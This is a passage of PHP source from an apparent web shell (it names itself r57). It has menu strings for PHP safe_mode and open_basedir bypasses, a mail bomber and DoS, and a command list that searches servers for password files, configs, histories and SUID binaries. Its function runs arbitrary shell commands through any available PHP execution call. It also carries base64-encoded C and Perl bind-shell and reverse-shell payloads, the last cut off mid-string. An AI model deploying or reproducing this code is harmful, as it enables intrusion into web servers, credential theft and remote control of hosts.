'tr_text103' => 'Send email', 'tr_text104' => 'Send file to email', 'tr_text105' => 'To', 'tr_text106' => 'From', 'tr_text107' => 'Subj', 'tr_butt15' => 'Send', 'tr_text108' => 'Mail', 'tr_text109' => 'Hide', 'tr_text110' => 'Show', 'tr_text111' => 'SQL-Server : Port', 'tr_text112' => 'Test bypass safe_mode with function mb_send_mail (PHP <= 4.0-4.2.2, 5.x)', 'tr_text113' => 'Test bypass safe_mode, view dir list via imap_list (PHP <= 5.1.2)', 'tr_text114' => 'Test bypass safe_mode, view file contest via imap_body (PHP <= 5.1.2)', 'tr_text115' => 'Test bypass safe_mode, copy file via copy[compress.zlib://] (PHP <= 4.4.2, 5.1.2)', 'tr_text116' => 'Copy from', 'tr_text117' => 'to', 'tr_text118' => 'File copied', 'tr_text119' => 'Cant copy file', 'tr_text120' => 'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST', 'tr_text121' => 'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST', 'tr_text122' => 'Test bypass open_basedir, view dir list via glob (PHP <= 5.2.x)', 'tr_text123' => 'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)', 'tr_text124' => 'Test bypass open_basedir, add data to file via error_log[php://] (PHP <= 5.1.4, 4.4.2)', 'tr_text125' => 'Data', 'tr_text126' => 'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)', 'tr_text127' => 'Test bypass open_basedir, add data to file via readfile[php://] (PHP <= 5.2.1, 4.4.4)', 'tr_text128' => 'Modify/Access date(touch)', 'tr_text129' => 'Test bypass open_basedir, create file via fopen[srpath://] (PHP v5.2.0)', 'tr_text130' => 'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)', 'tr_text131' => 'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)', 'tr_text132' => 'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)', 'tr_text133' => '', 'tr_text134' => 'Database-bruteforce', 'tr_text135' => 'Dictionary', 'tr_text136' => 'Creating evil symlink', 'tr_text137' => 'Useful', 'tr_text138' => 'Dangerous', 'tr_text139' => 'Mail Bomber', 'tr_text140' => 'DoS', 'tr_text141' => 'Danger! Web-daemon crash possible.', 'tr_err0' => 'Error! Can\'t write in file ', 'tr_err1' => 'Error! Can\'t read file ', 'tr_err2' => 'Error! Can\'t create ', 'tr_err3' => 'Error! Can\'t connect to ftp', 'tr_err4' => 'Error! Can\'t login on ftp server', 'tr_err5' => 'Error! Can\'t change dir on ftp', 'tr_err6' => 'Error! Can\'t sent mail', 'tr_err7' => 'Mail send',);
$aliases = array('----------------------------------locate' => '', 'locate httpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate httpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate vhosts.conf files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate vhosts.conf >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate proftpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate proftpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate psybnc.conf >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate psybnc.conf >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate my.conf files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate my.conf >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate admin.php files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate admin.php >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate cfg.php files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate cfg.php >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate conf.php files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate conf.php >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate config.dat files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate config.dat >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate config.php files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate config.php >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate config.inc files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate config.inc >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate config.inc.php files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate config.inc.php >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate config.default.php files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate config.default.php >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate .conf files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate ".conf" >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate .pwd files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate ".pwd" >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate .sql files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate ".sql" >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate .htpasswd files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate ".htpasswd" >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate .bash_history files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate ".bash_history" >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate .mysql_history files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate ".mysql_history" >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate backup files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate backup >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate dump files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate dump >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate priv files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate priv >> /tmp/grep.txt;cat /tmp/grep.txt', '----------------------------------tar' => '', 'tar -czvf all.tgz -T /tmp/grep.txt' => 'tar -czvf all.tgz -T /tmp/grep.txt', '----------------------------------1' => '', 'locate access_log files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate access_log >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate error_log files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate error_log >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate access.log files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate access.log >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate error.log files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate error.log >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate ".log" files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate ".log" >> /tmp/grep.txt;cat /tmp/grep.txt', '----------------------------------2' => '', 'cat /var/log/httpd/access_log | grep pass >> /tmp/grep.txt;cat /tmp/grep.txt' => 'cat /var/log/httpd/access_log | grep pass >> /tmp/grep.txt', '----------------------------------find' => '', 'find suid files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -perm -04000 -ls >> /tmp/grep.txt;cat /tmp/grep.txt', 'find suid files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find . -type f -perm -04000 -ls >> /tmp/grep.txt;cat /tmp/grep.txt', 'find sgid files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -perm -02000 -ls >> /tmp/grep.txt;cat /tmp/grep.txt', 'find sgid files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find . -type f -perm -02000 -ls >> /tmp/grep.txt;cat /tmp/grep.txt', 'find all writable files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -perm -2 -ls >> /tmp/grep.txt;cat /tmp/grep.txt', 'find all writable files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find . -type f -perm -2 -ls >> /tmp/grep.txt;cat /tmp/grep.txt', 'find all writable directories >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type d -perm -2 -ls >> /tmp/grep.txt;cat /tmp/grep.txt', 'find all writable directories in current dir >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find . -type d -perm -2 -ls >> /tmp/grep.txt;cat /tmp/grep.txt', 'find all writable directories and files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -perm -2 -ls >> /tmp/grep.txt;cat /tmp/grep.txt', 'find all writable directories and files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find . -perm -2 -ls >> /tmp/grep.txt;cat /tmp/grep.txt', 'find all .htpasswd files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name .htpasswd >> /tmp/grep.txt;cat /tmp/grep.txt', 'find all .bash_history files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name .bash_history >> /tmp/grep.txt;cat /tmp/grep.txt', 'find all .mysql_history files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name .mysql_history >> /tmp/grep.txt;cat /tmp/grep.txt', 'find all .fetchmailrc files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name .fetchmailrc >> /tmp/grep.txt;cat /tmp/grep.txt', 'find httpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name httpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt', 'find vhosts.conf files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name vhosts.conf >> /tmp/grep.txt;cat /tmp/grep.txt', 'find proftpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name proftpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt', 'find admin.php files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name admin.php >> /tmp/grep.txt;cat /tmp/grep.txt', 'find config* files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name "config*" >> /tmp/grep.txt;cat /tmp/grep.txt', 'find cfg.php files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name cfg.php >> /tmp/grep.txt;cat /tmp/grep.txt', 'find conf.php files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name conf.php >> /tmp/grep.txt;cat /tmp/grep.txt', 'find config.dat files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name config.dat >> /tmp/grep.txt;cat /tmp/grep.txt', 'find config.php files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name config.php >> /tmp/grep.txt;cat /tmp/grep.txt', 'find config.inc files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name config.inc >> /tmp/grep.txt;cat /tmp/grep.txt', 'find config.inc.php files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name config.inc.php >> /tmp/grep.txt;cat /tmp/grep.txt', 'find config.default.php files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name config.default.php >> /tmp/grep.txt;cat /tmp/grep.txt', 'find *.conf files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name "*.conf" >> /tmp/grep.txt;cat /tmp/grep.txt', 'find *.pwd files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name "*.pwd" >> /tmp/grep.txt;cat /tmp/grep.txt', 'find *.sql files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name "*.sql" >> /tmp/grep.txt;cat /tmp/grep.txt', 'find *backup* files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name "*backup*" >> /tmp/grep.txt;cat /tmp/grep.txt', 'find *dump* files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name "*dump*" >> /tmp/grep.txt;cat /tmp/grep.txt', '-----------------------------------' => '', 'find /var/ access_log files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find /var/ -type f -name access_log >> /tmp/grep.txt;cat /tmp/grep.txt', 'find /var/ error_log files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find /var/ -type f -name error_log >> /tmp/grep.txt;cat /tmp/grep.txt', 'find /var/ access.log files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find /var/ -type f -name access.log >> /tmp/grep.txt;cat /tmp/grep.txt', 'find /var/ error.log files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find /var/ -type f -name error.log >> /tmp/grep.txt;cat /tmp/grep.txt', 'find /var/ "*.log" files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find /var/ -type f -name "*.log" >> /tmp/grep.txt;cat /tmp/grep.txt', '----------------------------------------------------------------------------------------------------' => 'ls -la');
$table_up1 = "<tr><td bgcolor=#333333><font face=Verdana size=-2><b><div align=center>:: ";
$table_up2 = " ::</div></b></font></td></tr><tr><td>";
$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333>";
$table_end1 = "</td></tr>";
$arrow = " <font face=Webdings color=gray>4</font>";
$lb = "<font color=green>[</font>";
$rb = "<font color=green>]</font>";
$font = "<font face=Verdana size=-2>";
$ts = "<table class=table1 width=100% align=center>";
$te = "</table>";
$fs = "<form name=form method=POST>";
$fe = "</form>";
if (isset($_GET['users'])) {
if (!$users = get_users('/etc/passwd')) {
echo "<center><font face=Verdana size=-2 color=red>" . $lang[$language . '_text96'] . "</font></center>";
} else {
echo '<center>';
foreach ($users as $user) {
echo $user . "<br>";
}
echo '</center>';
}
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=''PHP_SELF'] . ">BACK</a> ]</b></font></div>";
die();
}
if (!empty($_POST['dir'])) {
if (@function_exists('chdir')) {
@chdir($_POST['dir']);
} else if (@function_exists('chroot')) {
@chroot($_POST['dir']);
};
}
if (empty($_POST['dir'])) {
if (@function_exists('chdir')) {
$dir = @getcwd();
};
} else {
$dir = $_POST['dir'];
}
$unix = 0;
if (strlen($dir) > 1 && $dir[1] == ":") $unix = 0;
else $unix = 1;
if (empty($dir)) {
$os = getenv('OS');
if (empty($os)) {
$os = @php_uname();
}
if (empty($os)) {
$os = "-";
$unix = 1;
} else {
if (@eregi("^win", $os)) {
$unix = 0;
} else {
$unix = 1;
}
}
}
if (!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") {
echo $head;
if (!empty($_POST['s_mask']) && !empty($_POST['m'])) {
$sr = new SearchResult($_POST['s_dir'], $_POST['s_text'], $_POST['s_mask']);
} else {
$sr = new SearchResult($_POST['s_dir'], $_POST['s_text']);
}
$sr->SearchText(0, 0);
$res = $sr->GetResultFiles();
$found = $sr->GetMatchesCount();
$titles = $sr->GetTitles();
$r = "";
if ($found > 0) {
$r.= "<TABLE width=100%>";
foreach ($res as $file => $v) {
$r.= "<TR>";
$r.= "<TD colspan=2><font face=Verdana size=-2><b>" . ws(3);
$r.= (!$unix) ? str_replace("/", "\\", $file) : $file;
$r.= "</b></font></ TD>";
$r.= "</TR>";
foreach ($v as $a => $b) {
$r.= "<TR>";
$r.= "<TD align=center><B><font face=Verdana size=-2>" . $a . "</font></B></TD>";
$r.= "<TD><font face=Verdana size=-2>" . ws(2) . $b . "</font></TD>";
$r.= "</TR>\n";
}
}
$r.= "</TABLE>";
echo $r;
} else {
echo "<P align=center><B><font face=Verdana size=-2>" . $lang[$language . '_text56'] . "</B></font></P>";
}
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=''PHP_SELF'] . ">BACK</a> ]</b></font></div>";
die();
}
if (!$safe_mode && strpos(ex("echo abcr57"), "r57") != 3) {
$safe_mode = 1;
}
$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
if (empty($SERVER_SOFTWARE)) {
$SERVER_SOFTWARE = "-";
}
function ws($i) {
return @str_repeat(" ", $i);
}
function ex($cfe) {
$res = '';
if (!empty($cfe)) {
if (@function_exists('exec')) {
@exec($cfe, $res);
$res = join("\n", $res);
} elseif (@function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif (@function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif (@function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif (@is_resource($f = @popen($cfe, "r"))) {
$res = "";
if (@function_exists('fread') && @function_exists('feof')) {
while (!@feof($f)) {
$res.= @fread($f, 1024);
}
} else if (@function_exists('fgets') && @function_exists('feof')) {
while (!@feof($f)) {
$res.= @fgets($f, 1024);
}
}
@pclose($f);
} elseif (@is_resource($f = @proc_open($cfe, array(1 => array("pipe", "w")), $pipes))) {
$res = "";
if (@function_exists('fread') && @function_exists('feof')) {
while (!@feof($pipes[1])) {
$res.= @fread($pipes[1], 1024);
}
} else if (@function_exists('fgets') && @function_exists('feof')) {
while (!@feof($pipes[1])) {
$res.= @fgets($pipes[1], 1024);
}
}
@proc_close($f);
} elseif (@function_exists('pcntl_exec') && @function_exists('pcntl_fork')) {
$res = '[~] Blind Command Execution via [pcntl_exec]\n\n';
$pid = @pcntl_fork();
if ($pid == - 1) {
$res.= '[-] Could not children fork. Exit';
} else if ($pid) {
if (@pcntl_wifexited($status)) {
$res.= '[+] Done! Command "' . $cfe . '" successfully executed.';
} else {
$res.= '[-] Error. Command incorrect.';
}
} else {
$cfe = array(" -e 'system(\"$cfe\")'");
if (@pcntl_exec('/usr/bin/perl', $cfe)) exit(0);
if (@pcntl_exec('/usr/local/bin/perl', $cfe)) exit(0);
die();
}
}
}
return $res;
}
function get_users($filename) {
$users = array();
$rows = @explode("\n", readzlib($filename));
if (!$rows) return 0;
foreach ($rows as $string) {
$user = @explode(":", trim($string));
if (substr($string, 0, 1) != '#') array_push($users, $user[0]);
}
return $users;
}
function err($n, $txt = '') {
echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>';
echo $GLOBALS['lang'][$GLOBALS['language'] . '_err' . $n];
if (!empty($txt)) {
echo " $txt";
}
echo '</b></div></font></td></tr></table>';
return null;
}
function perms($mode) {
if (!$GLOBALS['unix']) return 0;
if ($mode & 0x1000) {
$type = 'p';
} else if ($mode & 0x2000) {
$type = 'c';
} else if ($mode & 0x4000) {
$type = 'd';
} else if ($mode & 0x6000) {
$type = 'b';
} else if ($mode & 0x8000) {
$type = '-';
} else if ($mode & 0xA000) {
$type = 'l';
} else if ($mode & 0xC000) {
$type = 's';
} else $type = 'u';
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
if ($mode & 0x800) $owner["execute"] = ($owner['execute'] == 'x') ? 's' : 'S';
if ($mode & 0x400) $group["execute"] = ($group['execute'] == 'x') ? 's' : 'S';
if ($mode & 0x200) $world["execute"] = ($world['execute'] == 'x') ? 't' : 'T';
$s = sprintf("%1s", $type);
$s.= sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.= sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.= sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
}
function in($type, $name, $size, $value, $checked = 0) {
$ret = "<input type=" . $type . " name=" . $name . " ";
if ($size != 0) {
$ret.= "size=" . $size . " ";
}
$ret.= "value=\"" . $value . "\"";
if ($checked) $ret.= " checked";
return $ret . ">";
}
function which($pr) {
$path = '';
$path = ex("which $pr");
if (!empty($path)) {
return $path;
} else {
return false;
}
}
function cf($fname, $text) {
$w_file = @fopen($fname, "w") or @function_exists('file_put_contents') or err(0);
if ($w_file) {
@fwrite($w_file, base64_decode($text)) or @fputs($w_file, base64_decode($text)) or @file_put_contents($fname, base64_decode($text));
@fclose($w_file);
}
}
function sr($l, $t1, $t2) {
return "<tr class=tr1><td class=td1 width=" . $l . "% align=right>" . $t1 . "</td><td class=td1 align=left>" . $t2 . "</td></tr>";
}
if (!@function_exists("view_size")) {
function view_size($size) {
if ($size >= 1073741824) {
$size = @round($size / 1073741824 * 100) / 100 . " GB";
} elseif ($size >= 1048576) {
$size = @round($size / 1048576 * 100) / 100 . " MB";
} elseif ($size >= 1024) {
$size = @round($size / 1024 * 100) / 100 . " KB";
} else {
$size = $size . " B";
}
return $size;
}
}
function DirFilesR($dir, $types = '') {
$files = Array();
if (($handle = @opendir($dir)) || (@function_exists('scandir'))) {
while ((false !== ($file = @readdir($handle))) && (false !== ($file = @scandir($dir)))) {
if ($file != "." && $file != "..") {
if (@is_dir($dir . "/" . $file)) $files = @array_merge($files, DirFilesR($dir . "/" . $file, $types));
else {
$pos = @strrpos($file, ".");
$ext = @substr($file, $pos, @strlen($file) - $pos);
if ($types) {
if (@in_array($ext, explode(';', $types))) $files[] = $dir . "/" . $file;
} else $files[] = $dir . "/" . $file;
}
}
}
@closedir($handle);
}
return $files;
}
class SearchResult {
var $text;
var $FilesToSearch;
var $ResultFiles;
var $FilesTotal;
var $MatchesCount;
var $FileMatschesCount;
var $TimeStart;
var $TimeTotal;
var $titles;
function SearchResult($dir, $text, $filter = '') {
$dirs = @explode(";", $dir);
$this->FilesToSearch = Array();
for ($a = 0;$a < count($dirs);$a++) $this->FilesToSearch = @array_merge($this->FilesToSearch, DirFilesR($dirs[$a], $filter));
$this->text = $text;
$this->FilesTotal = @count($this->FilesToSearch);
$this->TimeStart = getmicrotime();
$this->MatchesCount = 0;
$this->ResultFiles = Array();
$this->FileMatchesCount = Array();
$this->titles = Array();
}
function GetFilesTotal() {
return $this->FilesTotal;
}
function GetTitles() {
return $this->titles;
}
function GetTimeTotal() {
return $this->TimeTotal;
}
function GetMatchesCount() {
return $this->MatchesCount;
}
function GetFileMatchesCount() {
return $this->FileMatchesCount;
}
function GetResultFiles() {
return $this->ResultFiles;
}
function SearchText($phrase = 0, $case = 0) {
$qq = @explode(' ', $this->text);
$delim = '|';
if ($phrase) foreach ($qq as $k => $v) $qq[$k] = '\b' . $v . '\b';
$words = '(' . @implode($delim, $qq) . ')';
$pattern = "/" . $words . "/";
if (!$case) $pattern.= 'i';
foreach ($this->FilesToSearch as $k => $filename) {
$this->FileMatchesCount[$filename] = 0;
$FileStrings = @file($filename) or @next;
for ($a = 0;$a < @count($FileStrings);$a++) {
$count = 0;
$CurString = $FileStrings[$a];
$CurString = @Trim($CurString);
$CurString = @strip_tags($CurString);
$aa = '';
if (($count = @preg_match_all($pattern, $CurString, $aa))) {
$CurString = @preg_replace($pattern, "<SPAN style='color: #990000;'><b>\\1</b></SPAN>", $CurString);
$this->ResultFiles[$filename][$a + 1] = $CurString;
$this->MatchesCount+= $count;
$this->FileMatchesCount[$filename]+= $count;
}
}
}
$this->TimeTotal = @round(getmicrotime() - $this->TimeStart, 4);
}
}
function getmicrotime() {
list($usec, $sec) = @explode(" ", @microtime());
return ((float)$usec + (float)$sec);
}
$port_bind_bd_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
$port_bind_bd_pl = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
lIENPTk47DQpleGl0IDA7DQp9DQp9";
$back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
$back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
